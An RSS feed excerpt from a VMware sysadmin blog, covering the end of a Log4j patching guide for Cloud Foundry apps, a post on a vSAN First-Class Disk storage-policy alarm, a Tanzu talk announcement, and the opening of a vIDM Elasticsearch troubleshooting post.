<pre><span style="font-weight: 400;">Copy the download link from the links section</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf oauth-token </span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">curl -L &lt;downloadLink&gt; --header "Authorization: &lt;oauthToken&gt;" -o app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">Now patch whatever needs to be patched in the app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf create-app-manifest vulnerableApp</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf push fixedApp -f vulnerableApp_manifest.yml -p app.zip</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf stop vulnerableApp</span></pre>
</li>
</ol>
<p><span style="font-weight: 400;">This will deploy a second, patched version alongside the vulnerable app with the same settings, effectively having a blue-green deployment of a patched and a vulnerable app. </span></p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full" src="https://i0.wp.com/imgs.xkcd.com/comics/dependency.png?resize=385%2C489&#038;ssl=1" alt="https://xkcd.com/2347/" width="385" height="489" /></p>
<h1><span style="font-weight: 400;">Appendix:</span></h1>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">How to detect the Log4j vulnerability in your applications: </span><a href="https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html"><span style="font-weight: 400;">https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Apache Log4j Security Vulnerabilities: </span><a href="https://logging.apache.org/log4j/2.x/security.html"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/security.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability:</span><span style="font-weight: 400;"><br />
</span><a href="https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228"><span style="font-weight: 400;">https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">National Vulnerability Database for CVE-2021-44228 (with some excellent links): </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228"><span style="font-weight: 400;">https://nvd.nist.gov/vuln/detail/CVE-2021-44228</span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">National Vulnerability Database for CVE-2021-45046 (with some excellent links): </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046"><span style="font-weight: 400;">https://nvd.nist.gov/vuln/detail/CVE-2021-45046</span></a></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">CISA guidance: </span><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance"><span style="font-weight: 400;">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">LunaSec blog post (Thanks Jonathan Regehr!): </span><a href="https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/"><span style="font-weight: 400;">https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Cloud Foundry post: </span><a href="https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/"><span style="font-weight: 400;">https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">VMware advisory: </span><a href="https://www.vmware.com/security/advisories/VMSA-2021-0028.html"><span style="font-weight: 400;">https://www.vmware.com/security/advisories/VMSA-2021-0028.html</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">VMware KB on products not affected: </span><a href="https://kb.vmware.com/s/article/87068"><span style="font-weight: 400;">https://kb.vmware.com/s/article/87068</span></a><span style="font-weight: 400;"> </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">BlueTeam CheatSheet, Advisories by all vendors</span><span style="font-weight: 400;"><br />
</span><a href="https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592"><span style="font-weight: 400;">https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592</span></a></li>
<li style="font-weight: 400;" aria-level="1"><a href="https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/"><span style="font-weight: 400;">https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/</span></a></li>
</ul>
<p><span style="font-weight: 400;">And when you need a laugh: </span><a href="https://log4jmemes.com/"><span style="font-weight: 400;">https://log4jmemes.com/</span></a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1712</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/12/log4jb.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1712</post-id>	</item>
		<item>
		<title>Mysterious vSAN datastore alert &#8211; and the relationship between First-Class disks and Cloud-Native storage</title>
		<link>https://thefluffyadmin.net/?p=1689</link>
					<comments>https://thefluffyadmin.net/?p=1689#comments</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 27 Aug 2021 15:56:57 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[storage]]></category>
		<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[CNS]]></category>
		<category><![CDATA[CSI]]></category>
		<category><![CDATA[enhanced virtual disk]]></category>
		<category><![CDATA[FCD]]></category>
		<category><![CDATA[first-class]]></category>
		<category><![CDATA[improved virtual disk]]></category>
		<category><![CDATA[IVD]]></category>
		<category><![CDATA[k8s]]></category>
		<category><![CDATA[vsan]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1689</guid>

					<description><![CDATA[Aug 27th, Robert Kloosterhuis ----------- I ran across an interesting 6.7 vSAN alarm today, that baffled me. This is vSphere 6.7 Update 3L (6.7.0.46000) &#160; Improved virtual disk infrastructure namespaces storage policy (alarm) So this is referring to the config setting we can find under Storage --&#62; vSAN Datastore object --&#62;  Configure -- General This <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1689">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Aug 27th, Robert Kloosterhuis</p>
<p>-----------</p>
<p>I ran across an interesting vSAN 6.7 alarm today that baffled me. This is on vSphere 6.7 Update 3L (6.7.0.46000).</p>
<p>&nbsp;</p>
<p><code class="c-mrkdwn__code" data-stringify-type="code">Improved virtual disk infrastructure namespaces storage policy (alarm)</code></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1692" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=640%2C115&#038;ssl=1" alt="" width="640" height="115" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?w=1397&amp;ssl=1 1397w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=300%2C54&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=1024%2C185&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?resize=768%2C139&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So this is referring to the config setting we can find under Storage --&gt; vSAN Datastore object --&gt; Configure --&gt; General.</p>
<p>This is a config setting that was introduced.. uhh.. somewhere.. but I could not find <i data-stringify-type="italic">any</i> reference or documentation about it.</p>
<p>There is no mention of the policy setting at all in the official docs for 6.7 or 7.0 (  <a class="c-link" href="https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html" target="_blank" rel="noopener noreferrer" data-sk="tooltip_parent">https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html</a> ) .</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1690" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=640%2C257&#038;ssl=1" alt="" width="640" height="257" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?w=1668&amp;ssl=1 1668w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=300%2C120&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=1024%2C411&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=768%2C308&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?resize=1536%2C616&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-14-35.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1691" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=640%2C403&#038;ssl=1" alt="" width="640" height="403" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?w=864&amp;ssl=1 864w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=300%2C189&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_15-15-11.png?resize=768%2C484&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>I suspect the alarm is being triggered in our case, because, as you can see from the screenshot, the setting was 'blank'.  I assume that in this case, it would revert to its default previous behaviour; to inherit the set VM Default Storage policy.  I am not sure about this though..  what would be the point of the alarm then?</p>
<p>But the wording between this config setting, and the warning, is all slightly different, so I am not sure.</p>
<p>'Home Storage Policy' vs 'Improved Virtual Disk Home Storage Policy' vs 'Improved virtual disk Infrastructure Namespaces Storage policy (alarm)'</p>
<p>So what is this referring to anyway??</p>
<p>&nbsp;</p>
<p>Cormac Hogan has a nice set of blog articles on this:</p>
<blockquote class="wp-embedded-content" data-secret="7TPGFBL1pc"><p><a href="https://cormachogan.com/2018/11/21/a-primer-on-first-class-disks-improved-virtual-disks/">A primer on First Class Disks/Improved Virtual Disks</a></p></blockquote>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted"  title="&#8220;A primer on First Class Disks/Improved Virtual Disks&#8221; &#8212; CormacHogan.com" src="https://cormachogan.com/2018/11/21/a-primer-on-first-class-disks-improved-virtual-disks/embed/#?secret=gpNet19oYX#?secret=7TPGFBL1pc" data-secret="7TPGFBL1pc" width="600" height="338" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe></p>
<p>and:</p>
<p><a href="https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/">https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/</a></p>
<p>&nbsp;</p>
<p>So Cormac's blog post is from 18 months ago. Has, in the meantime, VMware settled on a standard name for these things?</p>
<p>&nbsp;</p>
<p>First Class Disks (FCD)<br />
Improved Virtual Disk (IVD)<br />
Managed Virtual Disks<br />
Enhanced Virtual Disks</p>
<p>&nbsp;</p>
<p>It seems not, because while the vSphere 6.7 web client refers to these things as 'Improved Virtual Disks', the vSAN/CNS part of VMware still calls them 'First-Class Disks', or FCDs for short.<br />
But there is no mention of IVDs anywhere in the core vSAN docs (I did a search across the 4 PDFs). It's a shame, because this is pretty interesting technology.<br />
Ironically, they are mentioned far more as part of the vRealize 8 documentation. Here are some links:</p>
<p><a href="https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html">https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html</a><br />
<a href="https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html">https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html</a><br />
<a href="https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html">https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html</a></p>
<p>&nbsp;</p>
<p>Here is a mention of them, in regards to how they are used in Cloud Native Storage (or CNS). And in fact, this CNS use <em>appears</em> to be the primary use-case of FCD's being added to vSphere in the first place. But good luck finding that out :p</p>
<p>&nbsp;</p>
<p><a href="https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage">https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage</a></p>
<p>&nbsp;</p>
<blockquote><p><em>Persistent Volumes (PV) are created in vSphere as First-Class Disks (FCD). FCDs are independent disks with no VM attached. With the release of vSphere 7.0 U2, we are adding snapshot support of up to 32 snapshots for FCDs. This enables you to create snapshots of your K8s PVs which goes along with the SPBM multiple snapshot rules.</em></p>
<p>&nbsp;</p></blockquote>
<p>&nbsp;</p>
<p>More information on the vSphere CSI is here:<br />
<a href="https://vsphere-csi-driver.sigs.k8s.io/">https://vsphere-csi-driver.sigs.k8s.io/</a></p>
<p>This is actually pretty important..  if in the vSphere CSI (Container Storage Interface) for Kubernetes, Persistent Volumes are FCD objects...  and you can be in a situation where there is <em>no </em>default policy applied to them in vSAN.. then.. uhh.. they are NOT protected. Right?</p>
<p>Well.. no .. because even if this config setting is left blank, CNS objects seem to inherit the default storage policy set for the vSAN datastore. I double checked:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1697" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=640%2C325&#038;ssl=1" alt="" width="640" height="325" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?w=1560&amp;ssl=1 1560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=300%2C152&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=1024%2C519&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=768%2C389&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?resize=1536%2C779&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_17-47-39.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So to my mind.. that makes the alert message...  well.. pointless?</p>
<p>&nbsp;</p>
<p>It should be noted that in vSphere with Tanzu (TKGs), the storage policy for these kinds of objects is handled quite differently. In that case, the vSAN storage policy is associated with the <em>vSphere Namespace</em>.</p>
<p>&nbsp;</p>
<p>Here are some slides I made that explain how that works:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1693" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=640%2C350&#038;ssl=1" alt="" width="640" height="350" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?w=1332&amp;ssl=1 1332w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=300%2C164&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=1024%2C560&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?resize=768%2C420&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173345.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a> <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1694" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=640%2C370&#038;ssl=1" alt="" width="640" height="370" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?w=1305&amp;ssl=1 1305w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=300%2C173&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=1024%2C592&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173408.png?resize=768%2C444&amp;ssl=1 768w" sizes="auto, (max-width: 
640px) 100vw, 640px" /></a> <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1695" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=640%2C384&#038;ssl=1" alt="" width="640" height="384" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?w=1337&amp;ssl=1 1337w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=300%2C180&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=1024%2C614&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?resize=768%2C461&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-27-173505.png?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Up to today, the vCenter alarm <code class="c-mrkdwn__code" data-stringify-type="code">Improved virtual disk infrastructure namespaces storage policy (alarm)</code> was completely ungooglable. That is the main reason this blog post now exists.</p>
<p>&nbsp;</p>
<p>But I hope this simultaneously explains a bit about what these 'Improved Virtual Disks' are all about. I was a little shocked at how <em>little</em> official documentation VMware has published on this.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1689</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/08/2021-08-27_16-38-18.png</image><post-id xmlns="com-wordpress:feed-additions:1">1689</post-id>	</item>
		<item>
		<title>Speaking about Tanzu Kubernetes Grid at VMWorld2021 Code Connect and the UK- North West England VMUG!</title>
		<link>https://thefluffyadmin.net/?p=1677</link>
					<comments>https://thefluffyadmin.net/?p=1677#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 20 Aug 2021 10:36:28 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmug]]></category>
		<category><![CDATA[vmworld]]></category>
		<category><![CDATA[kubernetes]]></category>
		<category><![CDATA[speaking]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkg]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1677</guid>

					<description><![CDATA[Aug 20th, Robert Kloosterhuis &#160; Its been a very Tanzu year for me, after my 'Tanzu for Dummies Beginners' session (and CMTY Podcast appearance),  I am continuing to do some public speaking about Tanzu topics the coming months! &#160; I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1677">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<pre>Aug 20th, Robert Kloosterhuis</pre>
<p>&nbsp;</p>
<p>It's been a very Tanzu year for me. After my <a href="https://www.youtube.com/watch?v=MT7eNuQusu4">'Tanzu for <del>Dummies</del> Beginners'</a> session (and <a href="https://thefluffyadmin.net/?p=1658">CMTY Podcast appearance</a>), I am continuing to do some public speaking about Tanzu topics in the coming months!</p>
<p>&nbsp;</p>
<p>I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu Kubernetes Grid that VMware currently has available: TKGi (ex Pivotal PKS), TKG(m), and TKG(s) (aka 'vSphere with Tanzu') and the differences between them.  I am gonna deep dive into each version, look at how they are deployed, how they are used, and compare the configuration and design choices you will face with each.</p>
<p>&nbsp;</p>
<h2>VMworld 2021 Code Connect - The State of the TKG Art [CODE2780] - Oct 5</h2>
<p>Via the <a href="https://code.vmware.com/home">VMware{code} Program</a> (in which I am a Code Coach), and the Code Connect event that is attached to VMworld 2021 this year, I have a session that you can find in the VMworld scheduler!</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1678" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=640%2C309&#038;ssl=1" alt="" width="640" height="309" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?w=965&amp;ssl=1 965w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=300%2C145&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png?resize=768%2C371&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Use this search string to find it:</p>
<p><a href="https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg">https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg</a>, or just look for CODE2780</p>
<p>&nbsp;</p>
<p>I would also like to highlight the Session by Scott Rosenberg, Adding Custom Logic to TKG Cluster Deployment [CODE2749]</p>
<p>&nbsp;</p>
<h2>UK- North West England VMUG - Sep 9</h2>
<p><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">Nathan Byrne (<span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-jwli3a r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/Vm_nathbyrne">@Vm_nathbyrne</a>)</span> very graciously invited me to speak at the UK North West VMUG (<a href="https://twitter.com/NWEnglandVMUG">@NWEnglandVMUG</a>).</span></p>
<p>&nbsp;</p>
<p>Sign-up for it here:<br />
<a href="https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ">https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ</a></p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1677</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/08/Screenshot-2021-08-20-122912.png</image><post-id xmlns="com-wordpress:feed-additions:1">1677</post-id>	</item>
		<item>
		<title>vIDM Elasticsearch failing due to idm plugin messing with node count &#8211; hard fix</title>
		<link>https://thefluffyadmin.net/?p=1663</link>
					<comments>https://thefluffyadmin.net/?p=1663#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Mon, 29 Mar 2021 17:43:02 +0000</pubDate>
				<category><![CDATA[Troubleshooting]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[elastic]]></category>
		<category><![CDATA[elasticsearch]]></category>
		<category><![CDATA[idm]]></category>
		<category><![CDATA[vIDM]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1663</guid>

					<description><![CDATA[Robert Kloosterhuis, march 29, 2021 &#160; &#160; I ran into a strange issue with a vIDM 3.3.2.0 appliance today &#160; (vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access') &#160; The issue I had involved a single-node deployment. &#160; This is an important detail. vIDM can be clustered, and that <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1663">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Robert Kloosterhuis, March 29, 2021</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p>I ran into a strange issue with a vIDM 3.3.2.0 appliance today.</p>
<p>&nbsp;</p>
<p>(vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access')</p>
<p>&nbsp;</p>
<p>The issue I had involved a single-node deployment.</p>
<p>&nbsp;</p>
<p><em><strong>This is an important detail. vIDM can be clustered, and that means that many of the services running inside it (RabbitMQ, Elasticsearch) can also be clustered.<span style="color: #ff0000;"> The 'fix' I describe in this post (actually more of a workaround) should only ever be attempted on a single-node deployment. It will break the ability to make your vIDM install clustered. </span>  This is unsupported and totally at your own risk. </strong></em></p>
<p>&nbsp;</p>
<p>The issue was this:</p>
<p>&nbsp;</p>
<p>I was getting frequent errors in the vIDM user interface, referencing the Analytics service.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1664" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?resize=472%2C129&#038;ssl=1" alt="" width="472" height="129" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?w=472&amp;ssl=1 472w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg?resize=300%2C82&amp;ssl=1 300w" sizes="auto, (max-width: 472px) 100vw, 472px" /></a></p>
<p>&nbsp;</p>
<p>"Call to Analytics failed with status: 500"</p>
<p>&nbsp;</p>
<p>The Analytics service is, basically, a local installation of Elasticsearch, included on the vIDM appliances, and clustered if you have more than 1 vIDM node.</p>
<p>&nbsp;</p>
<p>I don't have any screenshot myself, but this post also nicely demonstrates what you would see in the vIDM Health Dashboard:</p>
<p>&nbsp;</p>
<p>https://geekcubo.com/vmware-identity-manager-cluster-19-03-elastic-search-service-issues/</p>
<p>Basically the 'Integrated Components' check in the Health Dashboard would be red. But in my case, no data at all was being produced by Elasticsearch. All the values were 'unknown'.</p>
<p>&nbsp;</p>
<p>To troubleshoot, we need to ssh into the vIDM VM, with the local 'sshuser' account. And then sudo to root.</p>
<p>&nbsp;</p>
<p>When I tried to troubleshoot, it was obvious that I could not get into the Elasticsearch API at all. It was throwing nothing but 500 errors.</p>
